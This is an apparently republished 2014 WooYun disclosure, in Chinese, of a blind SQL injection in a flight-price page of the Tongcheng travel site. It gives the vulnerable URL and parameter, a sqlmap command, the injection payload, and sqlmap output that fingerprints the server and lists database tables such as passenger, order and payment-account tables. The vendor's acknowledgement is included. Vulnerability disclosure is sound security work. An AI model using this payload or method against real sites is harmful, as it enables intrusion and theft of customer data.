[公开漏洞]苏州同程旅游网主站存在SQL注入漏洞

    来源:WooYun 浏览:495次 时间:2014-07-11
苏州同程旅游网主站存在SQL注入漏洞 相关厂商: 苏州同程旅游网络科技有限公司 漏洞作者:路人甲 提交时间:2014-05-27 09:57 公开时间:2014-07-11 09:58 漏洞类型:SQL注射漏洞 危害等级:高 自评Rank:12 漏洞状态: 厂商已经确认 漏洞来源:http://www.wooyun.org Tags标签: sql注入 漏洞详情 披露状态:

2014-05-27:细节已通知厂商并且等待厂商处理中
2014-05-27:厂商已经确认,细节仅向厂商公开
2014-06-06:细节向核心白帽子及相关领域专家公开
2014-06-16:细节向普通白帽子公开
2014-06-26:细节向实习白帽子公开
2014-07-11:细节向公众公开

简要描述:

SQL注入

详细说明:

http://www.ly.com/flight/FlightPriceNew.aspx?ajax=GetPageData&OrgPort=CSX&DesPort=&Sort=&CurrPage=2 参数orgport存在盲注



sqlmap知道数据库类型 --dbms="microsoft sql server" --dbs



看到这个http://wooyun.org/bugs/wooyun-2010-055900 官方说是老页面,就顺手看看新页面有没有,没有想到还真有。

漏洞证明:

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

---

Place: GET

Parameter: OrgPort

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: ajax=GetPageData&OrgPort=CSX' AND 7808=7808 AND 'rjNw'='rjNw&DesPort=&Sort=&CurrPage=2

---

web server operating system: Windows 2003

web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0

back-end DBMS: Microsoft SQL Server 2008

current database: 'TCFly'

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

---

Place: GET

Parameter: OrgPort

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: ajax=GetPageData&OrgPort=CSX' AND 7808=7808 AND 'rjNw'='rjNw&DesPort=&Sort=&CurrPage=2

---

web server operating system: Windows 2003

web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0

back-end DBMS: Microsoft SQL Server 2008

Database: TCFly

[60 tables]

+-----------------------------------------+

| dbo.Air_CabinCode |

| dbo.Air_Craft |

| dbo.Air_News |

| dbo.Air_PortCode |

| dbo.Air_WaysCode |

| dbo.AirportServiceDesk |

| dbo.FlightAirLine |

| dbo.FlightBookerHistory |

| dbo.FlightChangeOrder |

| dbo.FlightChangeOrderDetail |

| dbo.FlightChangeOrderSelfDealLog |

| dbo.FlightCnBus |

| dbo.FlightCoupon |

| dbo.FlightDP |

| dbo.FlightDPLog |

| dbo.FlightDelay |

| dbo.FlightETicketNOMonitor |

| dbo.FlightFCAchievement |

| dbo.FlightFCWorkRecord |

| dbo.FlightFDCache |

| dbo.FlightFinanceOverdue |

| dbo.FlightFinanceRefund |

| dbo.FlightFriendlyLink |

| dbo.FlightInsuranceOrder |

| dbo.FlightLineStat |

| dbo.FlightMailRecord |

| dbo.FlightMerchant |

| dbo.FlightMerchantReturnStat |

| dbo.FlightMerchantUrl |

| dbo.FlightMonitorETicketInfo |

| dbo.FlightORAssignHistory |

| dbo.FlightOrder |

| dbo.FlightOrderControlLog |

| dbo.FlightOrderExtend |

| dbo.FlightOrderLog |

| dbo.FlightOrderRouteInfo |

| dbo.FlightPassenger |

| dbo.FlightPicture |

| dbo.FlightPlatformProduct |

| dbo.FlightPortFloor |

| dbo.FlightRejectOrder |

| dbo.FlightRejectRecord |

| dbo.FlightSKCache |

| dbo.FlightSPOrderRelation |

| dbo.FlightSelfOrder |

| dbo.FlightSpecialPrice |

| dbo.FlightSystemUser |

| dbo.FlightTime |

| dbo.Flight_Wap_Mypassenger |

| dbo.Flight_Wap_Order |

| dbo.IdGenerator |

| dbo.MSreplication_objects |

| dbo.MSreplication_subscriptions |

| dbo.MSsavedforeignkeycolumns |

| dbo.MSsavedforeignkeyextendedproperties |

| dbo.MSsavedforeignkeys |

| dbo.MSsnapshotdeliveryprogress |

| dbo.MSsubscription_agents |

| dbo.SpecialsTicketCache |

| dbo.WebPayAccount |

+-----------------------------------------+

QQ图片20140527095147.jpg





修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应 厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2014-05-27 10:37

厂商回复:

感谢提交,正在修复中

最新状态:

暂无

上一篇: [公开漏洞]腾讯某分站可上传任意swf文件导致的一系列问题(附简单POC)
下一篇: [公开漏洞]淘宝网某分站完整泄露绑定实名认证的支付宝的完整身份证号码和绑定的手机号
当前位置:站长啦网站目录 » 站长资讯 » 站长新闻 » 漏洞预警 » 文章详细